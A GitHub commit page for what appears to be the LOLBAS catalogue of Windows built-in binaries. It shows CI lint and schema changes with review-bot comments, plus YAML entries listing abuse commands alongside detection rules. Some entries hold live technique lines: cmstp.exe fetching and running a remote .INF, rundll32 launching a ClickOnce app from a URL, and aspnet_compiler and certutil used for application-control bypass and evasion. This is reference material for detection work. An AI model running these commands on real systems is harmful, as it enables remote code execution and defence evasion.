Merge branch 'master' into alias_introduction

This commit is contained in:
Conor Richard 2022-09-15 13:54:50 -04:00 committed by GitHub
commit 3347e43b3f
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
170 changed files with 622 additions and 602 deletions

8
.github/.yamllint vendored

@ -4,12 +4,12 @@ yaml-files:
- '*.yml'
rules:
new-line-at-end-of-file:
level: warning
level: error
trailing-spaces:
level: warning
level: error
line-length:
level: warning
new-lines:
level: warning
level: error
indentation:
level: warning
level: error


@ -16,7 +16,7 @@ jobs:
- name: Change .yml to .md
run: |
for x in $(find yml/ -name '*.yml'); do mv "$x" "${x/%\.yml/.md}"; done
for x in $(find yml/ -name '*.yml'); do echo "---" >> "$x"; mv "$x" "${x/%\.yml/.md}"; done
mv yml/OSBinaries yml/Binaries
mv yml/OSLibraries yml/Libraries
mv yml/OSScripts yml/Scripts
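Review bot: The rewritten `for x in $(find yml/ -name '*.yml'); do echo "---" >> "$x"; mv ...` line still word-splits the `find` output, so any path containing whitespace would be split into separate iterations and the appended `---` would land in a file that does not exist. Since the line is being changed anyway, `find yml/ -name '*.yml' -exec sh -c 'echo "---" >> "$1"; mv "$1" "${1%.yml}.md"' _ {} \;` does the same work without relying on unquoted expansion. The enclosing `run:` step and its job begin outside the hunk.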


@ -1,19 +1,35 @@
---
name: YAML Lint
on:
push:
branches:
- master
pull_request:
branches:
- master
name: PUSH & PULL REQUEST - YAML Lint and Schema Validation Checks
on: [push,pull_request]
jobs:
lintFiles:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v1
- uses: actions/checkout@v3
- name: yaml-lint
uses: ibiqlik/action-yamllint@v3
with:
no_warnings: true
file_or_dir: yml/**/*.yml
config_file: .github/.yamllint
- name: Validate OSBinaries YAML Schema
uses: cketti/action-pykwalify@v0.3-temp-fix
with:
files: yml/OSBinaries/*.yml
schema: YML-Schema.yml
- name: Validate OSLibraries YAML Schema
uses: cketti/action-pykwalify@v0.3-temp-fix
with:
files: yml/OSLibraries/*.yml
schema: YML-Schema.yml
- name: Validate OSScripts YAML Schema
uses: cketti/action-pykwalify@v0.3-temp-fix
with:
files: yml/OSScripts/*.yml
schema: YML-Schema.yml
- name: Validate OtherMSBinaries YAML Schema
uses: cketti/action-pykwalify@v0.3-temp-fix
with:
files: yml/OtherMSBinaries/*.yml
schema: YML-Schema.yml
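Review bot: Every third-party action in the new step list is referenced by a mutable tag (`actions/checkout@v3`, `ibiqlik/action-yamllint@v3`, and four times `cketti/action-pykwalify@v0.3-temp-fix`), so whoever controls those tags decides what code runs in this repository's CI; the `v0.3-temp-fix` ref in particular reads as a branch name rather than a release. Pin each to a full-length commit SHA and keep the tag as a trailing comment, e.g. `uses: cketti/action-pykwalify@<commit-sha>  # v0.3-temp-fix`; the same applies to the copy of these steps in the new `.github/yaml-lint-reviewdog.yml.bak`. The four pykwalify steps differ only in the `files:` glob and could be collapsed into one step driven by a `strategy.matrix` over the directory name. Minor: `on: [push,pull_request]` is missing the space after the comma.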

35
.github/yaml-lint-reviewdog.yml.bak vendored Normal file

@ -0,0 +1,35 @@
---
name: PULL_REQUEST - YAML Lint with Reviewdog & Schema Checks
on: [pull_request]
jobs:
lintFiles:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v3
- name: Run yamllint
uses: reviewdog/action-yamllint@v1
with:
level: error
reporter: github-pr-review # Change reporter.
yamllint_flags: '--config-file .github/.yamllint yml/**/*.yml'
- name: Validate OSBinaries YAML Schema
uses: cketti/action-pykwalify@v0.3-temp-fix
with:
files: yml/OSBinaries/*.yml
schema: YML-Schema.yml
- name: Validate OSLibraries YAML Schema
uses: cketti/action-pykwalify@v0.3-temp-fix
with:
files: yml/OSLibraries/*.yml
schema: YML-Schema.yml
- name: Validate OSScripts YAML Schema
uses: cketti/action-pykwalify@v0.3-temp-fix
with:
files: yml/OSScripts/*.yml
schema: YML-Schema.yml
- name: Validate OtherMSBinaries YAML Schema
uses: cketti/action-pykwalify@v0.3-temp-fix
with:
files: yml/OtherMSBinaries/*.yml
schema: YML-Schema.yml
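Review bot: `.github/yaml-lint-reviewdog.yml.bak` sits outside `.github/workflows/` and carries a `.bak` suffix, so GitHub Actions will never load it; as committed it is dead configuration that will silently drift from the live workflow. Its `reporter: github-pr-review # Change reporter.` line also preserves an unresolved instruction to the author rather than documenting the choice. Either delete the file or, if it is meant as the pull-request variant, move it under `.github/workflows/` with a real `.yml` name and replace the comment with what the setting does, e.g. `# post findings as pull-request review comments`.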


@ -25,4 +25,3 @@ Resources:
Acknowledgement:
- Person: Pierre-Alexandre Braeken
Handle: '@pabraeken'
---


@ -23,4 +23,3 @@ Resources:
Acknowledgement:
- Person: Bart
Handle: '@bartblaze'
---


@ -15,4 +15,3 @@ Full_Path:
- Path: '%localappdata%\Whatsapp\Update.exe'
Detection:
- IOC: '"%localappdata%\Whatsapp\Update.exe" spawned an unknown process'
---


@ -25,4 +25,3 @@ Acknowledgement:
Handle: '@@vysecurity'
- Person: Adam (Internals)
Handle: '@Hexacorn'
---

118
YML-Schema.yml Normal file

@ -0,0 +1,118 @@
---
type: map
mapping:
# Id field enhancement possibility commenting out for now
# "Id":
# type: str
# required: true
# pattern: '[a-zA-Z0-9]{8}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{12}'
"Name":
type: str
required: true
"Description":
type: str
required: true
"Aliases":
type: seq
required: false
sequence:
- type: map
mapping:
"Alias":
type: str
required: false
"Author":
type: str
required: true
"Created":
type: date
required: true
"Commands":
type: seq
required: true
sequence:
- type: map
mapping:
"Command":
type: str
required: true
"Description":
type: str
required: true
"Usecase":
type: str
required: true
"Category":
type: str
required: true
enum: [ADS, AWL Bypass, Compile, Conceal, Copy, Credentials, Decode, Download, Dump, Encode, Execute, Reconnaissance, Tamper, UAC Bypass, Upload]
"Privileges":
type: str
required: true
"MitreID":
type: str
required: true
pattern: '^T[0-9]{4}(\.[0-9]{3})?$'
"OperatingSystem":
type: str
required: true
"Full_Path":
type: seq
required: true
sequence:
- type: map
mapping:
"Path":
type: str
required: true
"Code_Sample":
type: seq
required: false
sequence:
- type: map
mapping:
"Code":
type: str
"Detection":
type: seq
required: false
sequence:
- type: map
mapping:
"IOC":
type: str
"Sigma":
type: str
pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
"Analysis":
type: str
pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
"Elastic":
type: str
pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
"Splunk":
type: str
pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
"BlockRule":
type: str
pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
"Resources":
type: seq
required: false
sequence:
- type: map
mapping:
"Link":
type: str
pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
"Acknowledgement":
type: seq
required: false
sequence:
- type: map
mapping:
"Person":
type: str
"Handle":
type: str
pattern: '^(@(\w){1,15})?$'
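Review bot: The schema declares `"Aliases"` in the top-level mapping (it sits between `"Description"` and `"Author"`) as a sequence of maps keyed `"Alias"`, but the template hunk in this same commit adds `Aliases:` inside a `Commands` entry (between `Description` and `Usecase`) as a plain list of strings; pykwalify rejects keys that a `mapping` does not declare, so a file written from the template would fail this schema, or vice versa. Decide which shape is intended and make the two agree — if aliases belong to the binary, the template entry moves to the top level and becomes `- Alias: ProcDump64.exe`; if they belong to a command, the `"Aliases"` block moves under the `"Commands"` item mapping. Separately, the `"Handle"` pattern `'^(@(\w){1,15})?$'` will reject the existing `'@@vysecurity'` value that appears as context elsewhere in this commit, so that data file needs fixing in the same change or CI goes red on merge. In the repeated URL pattern the class `[$-_@.&+#]` is a range from `$` (0x24) to `_` (0x5F), which already covers digits, uppercase letters, `:`, `<`, `>`, `?` and `\`, so the pattern is far looser than it looks and the `[a-zA-Z]|[0-9]` alternatives are redundant; `[$\-_@.&+#]` is probably what was meant. This page has lost indentation, so the nesting above is read from key order and is worth confirming in the raw file.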


@ -8,6 +8,8 @@ Created: YYYY-MM-DD (date the person created this file)
Commands:
- Command: The command
Description: Description of the command
Aliases:
- An alias for the command (example: ProcDump.exe & ProcDump64.exe)
Usecase: A description of the usecase
Category: Execute
Privileges: Required privs
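Review bot: The new list item `- An alias for the command (example: ProcDump.exe & ProcDump64.exe)` contains `: ` inside an unquoted scalar, so a YAML parser reads it as a one-key mapping (`An alias for the command (example` → `ProcDump.exe & ProcDump64.exe)`) rather than the string it is meant to be, and the template no longer illustrates the plain list it describes. Quote it: `- 'An alias for the command (example: ProcDump.exe & ProcDump64.exe)'`. The template's `Commands` entry begins before this hunk.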


@ -20,4 +20,3 @@ Resources:
Acknowledgement:
- Person: Wade Hickey
Handle: '@notwhickey'
---


@ -1,28 +1,27 @@
---
Name: Aspnet_Compiler.exe
Description: ASP.NET Compilation Tool
Author: Jimmy (@bohops)
Created: 2021-09-26
Commands:
- Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe -v none -p C:\users\cpl.internal\desktop\asptest\ -f C:\users\cpl.internal\desktop\asptest\none -u
Description: Execute C# code with the Build Provider and proper folder structure in place.
Usecase: Execute proxied payload with Microsoft signed binary to bypass application control solutions
Category: AWL Bypass
Privileges: User
MitreID: T1127
OperatingSystem: Windows 10
Full_Path:
- Path: c:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
- Path: c:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
Code_Sample:
- Code: https://github.com/ThunderGunExpress/BringYourOwnBuilder
Detection:
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
- Sigma: https://github.com/SigmaHQ/sigma/blob/960a03eaf480926ed8db464477335a713e9e6630/rules/windows/process_creation/win_pc_lobas_aspnet_compiler.yml
Resources:
- Link: https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/
- Link: https://docs.microsoft.com/en-us/dotnet/api/system.web.compilation.buildprovider.generatecode?view=netframework-4.8
Acknowledgement:
- Person: cpl
Handle: '@cpl3h'
---
---
Name: Aspnet_Compiler.exe
Description: ASP.NET Compilation Tool
Author: Jimmy (@bohops)
Created: 2021-09-26
Commands:
- Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe -v none -p C:\users\cpl.internal\desktop\asptest\ -f C:\users\cpl.internal\desktop\asptest\none -u
Description: Execute C# code with the Build Provider and proper folder structure in place.
Usecase: Execute proxied payload with Microsoft signed binary to bypass application control solutions
Category: AWL Bypass
Privileges: User
MitreID: T1127
OperatingSystem: Windows 10
Full_Path:
- Path: c:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
- Path: c:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
Code_Sample:
- Code: https://github.com/ThunderGunExpress/BringYourOwnBuilder
Detection:
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
- Sigma: https://github.com/SigmaHQ/sigma/blob/960a03eaf480926ed8db464477335a713e9e6630/rules/windows/process_creation/win_pc_lobas_aspnet_compiler.yml
Resources:
- Link: https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/
- Link: https://docs.microsoft.com/en-us/dotnet/api/system.web.compilation.buildprovider.generatecode?view=netframework-4.8
Acknowledgement:
- Person: cpl
Handle: '@cpl3h'


@ -23,7 +23,7 @@ Detection:
- IOC: Registry Key - Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\At1.
Resources:
- Link: https://freddiebarrsmith.com/at.txt
- Link: https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html - Escalate to System from Administrator
- Link: https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html
- Link: https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems
Acknowledgement:
- Person: 'Freddie Barr-Smith'
@ -34,4 +34,3 @@ Acknowledgement:
Handle:
- Person: 'Xabier Ugarte-Pedrero'
Handle:
---


@ -14,17 +14,14 @@ Commands:
Full_Path:
- Path: C:\Windows\System32\Atbroker.exe
- Path: C:\Windows\SysWOW64\Atbroker.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/eb406ba36fc607986970c09e53058af412093647/rules/windows/process_creation/win_susp_atbroker.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/7bca85e40618126643b9712b80bd663c21908e26/rules/windows/registry_event/sysmon_susp_atbroker_change.yml
- IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration
- IOC: Changes to HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs
- IOC: Unknown AT starting C:\Windows\System32\ATBroker.exe /start malware
- Sigma: https://github.com/SigmaHQ/sigma/blob/eb406ba36fc607986970c09e53058af412093647/rules/windows/process_creation/win_susp_atbroker.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/7bca85e40618126643b9712b80bd663c21908e26/rules/windows/registry_event/sysmon_susp_atbroker_change.yml
- IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration
- IOC: Changes to HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs
- IOC: Unknown AT starting C:\Windows\System32\ATBroker.exe /start malware
Resources:
- Link: http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/
Acknowledgement:
- Person: Adam
Handle: '@hexacorn'
---


@ -48,4 +48,3 @@ Acknowledgement:
Handle: '@aionescu'
- Person: Asif Matadar
Handle: '@d1r4c'
---


@ -46,7 +46,7 @@ Detection:
- IOC: bitsadmin creates new files
- IOC: bitsadmin adds data to alternate data stream
Resources:
- Link: https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679 - slide 53
- Link: https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679
- Link: https://www.youtube.com/watch?v=_8xJaaQlpBo
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
Acknowledgement:
@ -56,4 +56,3 @@ Acknowledgement:
Handle: '@carnal0wnage'
- Person: Oddvar Moe
Handle: '@oddvarmoe'
---


@ -34,4 +34,3 @@ Resources:
Acknowledgement:
- Person: Ensar Samil
Handle: '@sblmsrsn'
---


@ -32,4 +32,3 @@ Resources:
Acknowledgement:
- Person: David Middlehurst
Handle: '@dtmsecurity'
---


@ -39,7 +39,7 @@ Commands:
Privileges: User
MitreID: T1140
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: certutil --decodehex encoded_hexadecimal_InputFileName
- Command: certutil -decodehex encoded_hexadecimal_InputFileName decodedOutputFileName
Description: Command to decode a hexadecimal-encoded file decodedOutputFileName
Usecase: Decode files to evade defensive measures
Category: Decode
@ -75,4 +75,3 @@ Acknowledgement:
- Person: egre55
Handle: '@egre55'
- Person: Lior Adar
---


@ -21,17 +21,14 @@ Commands:
Full_Path:
- Path: C:\Windows\System32\cmd.exe
- Path: C:\Windows\SysWOW64\cmd.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/688df3405afd778d63a2ea36a084344a2052848c/rules/windows/process_creation/process_creation_alternate_data_streams.yml
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_ads_file_creation.toml
- Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml
- IOC: cmd.exe executing files from alternate data streams.
- IOC: cmd.exe creating/modifying file contents in an alternate data stream.
- Sigma: https://github.com/SigmaHQ/sigma/blob/688df3405afd778d63a2ea36a084344a2052848c/rules/windows/process_creation/process_creation_alternate_data_streams.yml
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_ads_file_creation.toml
- Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml
- IOC: cmd.exe executing files from alternate data streams.
- IOC: cmd.exe creating/modifying file contents in an alternate data stream.
Resources:
- Link: https://twitter.com/yeyint_mth/status/1143824979139579904
Acknowledgement:
- Person: r0lan
Handle: '@yeyint_mth'
---


@ -14,14 +14,11 @@ Commands:
Full_Path:
- Path: C:\Windows\System32\cmdkey.exe
- Path: C:\Windows\SysWOW64\cmdkey.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/c3c152d457773454f67895008a1abde823be0755/rules/windows/process_creation/win_cmdkey_recon.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/c3c152d457773454f67895008a1abde823be0755/rules/windows/process_creation/win_cmdkey_recon.yml
Resources:
- Link: https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation
- Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey
Acknowledgement:
- Person:
Handle:
---


@ -23,4 +23,3 @@ Resources:
Acknowledgement:
- Person: Elliot Killick
Handle: '@elliotkillick'
---


@ -14,24 +14,22 @@ Commands:
- Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf
Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
Usecase: Execute code hidden within an inf file. Execute code directly from Internet.
Category: AwL bypass
Category: AWL Bypass
Privileges: User
MitreID: T1218.003
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full_Path:
- Path: C:\Windows\System32\cmstp.exe
- Path: C:\Windows\SysWOW64\cmstp.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/6d0d58dfe240f7ef46e7da928c0b65223a46c3b2/rules/windows/process_creation/sysmon_cmstp_execution_by_creation.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_uac_cmstp.yml
- Splunk: https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/cmlua_or_cmstplua_uac_bypass.yml
- Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml
- IOC: Execution of cmstp.exe without a VPN use case is suspicious
- IOC: DotNet CLR libraries loaded into cmstp.exe
- IOC: DotNet CLR Usage Log - cmstp.exe.log
- Sigma: https://github.com/SigmaHQ/sigma/blob/6d0d58dfe240f7ef46e7da928c0b65223a46c3b2/rules/windows/process_creation/sysmon_cmstp_execution_by_creation.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_uac_cmstp.yml
- Splunk: https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/cmlua_or_cmstplua_uac_bypass.yml
- Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml
- IOC: Execution of cmstp.exe without a VPN use case is suspicious
- IOC: DotNet CLR libraries loaded into cmstp.exe
- IOC: DotNet CLR Usage Log - cmstp.exe.log
Resources:
- Link: https://twitter.com/NickTyrer/status/958450014111633408
- Link: https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80
@ -44,4 +42,3 @@ Acknowledgement:
Handle: '@oddvarmoe'
- Person: Nick Tyrer
Handle: '@NickTyrer'
---


@ -29,4 +29,3 @@ Resources:
Acknowledgement:
- Person: Ialle Teixeira
Handle: '@NtSetDefault'
---


@ -24,4 +24,3 @@ Acknowledgement:
Handle: '@hexacorn'
- Person: Wietze
Handle: '@wietze'
---


@ -15,16 +15,16 @@ Full_Path:
- Path: C:\Windows\System32\control.exe
- Path: C:\Windows\SysWOW64\control.exe
Code_Sample:
- Code:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/e8b633f54fce88e82b1c3d5e7c7bfa7d3d0beee7/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_control_dll_load.yml
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml
- Elastic: https://github.com/elastic/detection-rules/blob/0875c1e4c4370ab9fbf453c8160bb5abc8ad95e7/rules/windows/defense_evasion_execution_control_panel_suspicious_args.toml
- Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml
- IOC: Control.exe executing files from alternate data streams
- IOC: Control.exe executing library file without cpl extension
- IOC: Suspicious network connections from control.exe
- Sigma: https://github.com/SigmaHQ/sigma/blob/e8b633f54fce88e82b1c3d5e7c7bfa7d3d0beee7/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_control_dll_load.yml
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml
- Elastic: https://github.com/elastic/detection-rules/blob/0875c1e4c4370ab9fbf453c8160bb5abc8ad95e7/rules/windows/defense_evasion_execution_control_panel_suspicious_args.toml
- Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml
- IOC: Control.exe executing files from alternate data streams
- IOC: Control.exe executing library file without cpl extension
- IOC: Suspicious network connections from control.exe
Resources:
- Link: https://pentestlab.blog/2017/05/24/applocker-bypass-control-panel/
- Link: https://www.contextis.com/resources/blog/applocker-bypass-registry-key-manipulation/
@ -34,4 +34,3 @@ Resources:
Acknowledgement:
- Person: Jimmy
Handle: '@bohops'
---


@ -22,16 +22,15 @@ Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe
Code_Sample:
- Code:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_csc.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_csc_folder.yml
- Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml
- Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_execution_msbuild_started_unusal_process.toml
- IOC: Csc.exe should normally not run as System account unless it is used for development.
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_csc.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_csc_folder.yml
- Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml
- Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_execution_msbuild_started_unusal_process.toml
- IOC: Csc.exe should normally not run as System account unless it is used for development.
Resources:
- Link: https://docs.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/command-line-building-with-csc-exe
Acknowledgement:
- Person:
Handle:
---


@ -15,22 +15,21 @@ Full_Path:
- Path: C:\Windows\System32\cscript.exe
- Path: C:\Windows\SysWOW64\cscript.exe
Code_Sample:
- Code:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_script_execution.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/file_event/sysmon_susp_clr_logs.yml
- Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml
- Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/command_and_control_remote_file_copy_scripts.toml
- Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml
- Splunk: https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/wscript_or_cscript_suspicious_child_process.yml
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
- IOC: Cscript.exe executing files from alternate data streams
- IOC: DotNet CLR libraries loaded into cscript.exe
- IOC: DotNet CLR Usage Log - cscript.exe.log
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_script_execution.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/file_event/sysmon_susp_clr_logs.yml
- Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml
- Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/command_and_control_remote_file_copy_scripts.toml
- Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml
- Splunk: https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/wscript_or_cscript_suspicious_child_process.yml
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
- IOC: Cscript.exe executing files from alternate data streams
- IOC: DotNet CLR libraries loaded into cscript.exe
- IOC: DotNet CLR Usage Log - cscript.exe.log
Resources:
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
- Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
Acknowledgement:
- Person: Oddvar Moe
Handle: '@oddvarmoe'
---


@ -27,4 +27,3 @@ Resources:
Acknowledgement:
- Person: Ialle Teixeira
Handle: '@NtSetDefault'
---


@ -26,4 +26,3 @@ Resources:
Acknowledgement:
- Person: Gal Kristal
Handle: '@gal_kristal'
---


@ -7,7 +7,7 @@ Commands:
- Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo
Description: Executes click-once-application from Url (trampoline for Dfsvc.exe, DotNet ClickOnce host)
Usecase: Use binary to bypass Application whitelisting
Category: AWL bypass
Category: AWL Bypass
Privileges: User
MitreID: T1127
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
@ -17,13 +17,12 @@ Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe
Code_Sample:
- Code:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml
Resources:
- Link: https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf
- Link: https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe
Acknowledgement:
- Person: Casey Smith
Handle: '@subtee'
---


@ -35,4 +35,3 @@ Acknowledgement:
Handle: '@tim8288'
- Person: Hai Vaknin
Handle: '@vakninhai'
---


